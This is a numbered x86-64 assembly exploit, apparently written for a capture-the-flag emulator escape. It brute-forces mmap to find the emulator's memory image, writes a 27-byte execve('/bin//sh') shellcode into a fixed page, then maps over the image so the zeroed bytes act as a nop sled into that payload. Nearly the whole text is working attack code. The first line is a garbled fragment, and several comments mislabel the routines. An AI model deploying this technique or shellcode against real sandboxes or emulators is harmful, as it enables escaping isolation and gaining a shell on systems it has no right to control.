; This is probably good place to start looking for the imagemov r14, 0x55000

1.  
2. ; This is probably good place to start looking for the image
3. mov r14, 0x550000000000
4.  
5. ; Start mapping to find a failing mapping, MAP_FIXED_NOREPLACE is used.
6. brute:
7. mov rsi, 0xf0000000
8. call Check
9. test eax, eax
10. jz done_brute
11. push r14
12. mov rsi, 0xf0000000
13. sub r14, rsi
14. call Free
15. pop r14
16. jmp brute
17.  
18. done_brute:
19.  
20. call Done
21.  
22. ; Map page right after failing range
23. mov rsi, 0x2000
24. mov rdi, r14
25. mov rax, 0xf0000000
26. add rdi, rax
27. xor r9d, r9d
28. mov r8d, -1
29. mov r10d, 0x4032
30. mov rdx, 7
31. mov eax, 9
32. syscall
33.  
34. ; Place payload at the start of that mapping
35. mov rsi, payload
36. mov rdi, r14
37. mov rax, 0xf0000000
38. add rdi, rax
39. mov rax, 0
40.  
41. gogo_pow:
42. mov dl, [rsi]
43. mov [rdi], dl
44. cmp rax, 27
45. jge done_pow
46. inc rax
47. inc rsi
48. inc rdi
49. jmp gogo_pow
50.  
51. done_pow:
52.  
53. ; Now, map the memory which overlaps the emulator image
54. ; This will zero out the memory, which in turn will result in the sled of instructions `add byte ptr [rax], al`
55. ; But `rax` seems to point to an address within the range, so this will essentially turn into a "nop sled"
56. mov rsi, 0xf0000000
57. mov rdi, r14
58. xor r9d, r9d
59. mov r8d, -1
60. mov r10d, 0x4032
61. mov rdx, 7
62. mov eax, 9
63. syscall
64.  
65. oho:
66. jmp oho
67.  
68. Check:
69. call Alloc
70. test eax, eax
71. jnz fail
72. add r14, rsi
73. call Good
74. mov rax, 1
75. ret
76. fail:
77. call NotGood
78. mov rax, 0
79. ret
80.  
81. Corrupt:
82. mov rsi, 0x1000
83. xor r9d, r9d
84. mov r8d, -1
85. mov r10d, 0x4032
86. mov rdx, 7
87. mov eax, 9
88. syscall
89.  
90. mov rax, 0
91. mov rbx, 0x10000
92. over:
93. mov [rdi], rbx
94. add rdi, 8
95. add rax, 8
96. cmp rax, 0x1000
97. jge okok
98. jmp over
99. okok:
100.  
101. ret
102.  
103. Alloc:
104. xor r9d, r9d
105. mov r8d, -1
106. mov r10d, 0x104022
107. mov rdx, 7
108. mov rdi, r14
109. mov eax, 9
110. syscall
111. ret
112.  
113. Free:
114. mov rdi, r14
115. mov eax, 11
116. syscall
117. ret
118.  
119. NotGood:
120. ; print "mmap failed!"
121. mov edx, 13
122. mov esi, msgError
123. mov edi, 1
124. mov eax, 1
125. syscall
126. ret
127.  
128. Good:
129. ; print "mmap failed!"
130. mov edx, 9
131. mov esi, msgOk
132. mov edi, 1
133. mov eax, 1
134. syscall
135. ret
136.  
137. Done:
138. ; print "mmap failed!"
139. mov edx, 5
140. mov esi, msgDone
141. mov edi, 1
142. mov eax, 1
143. syscall
144. ret
145.  
146. msgOk: db "mmap ok!", 0x0A
147. msgError: db "mmap failed!", 0x0A
148. msgDone: db "done", 0x0A
149. payload: db 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05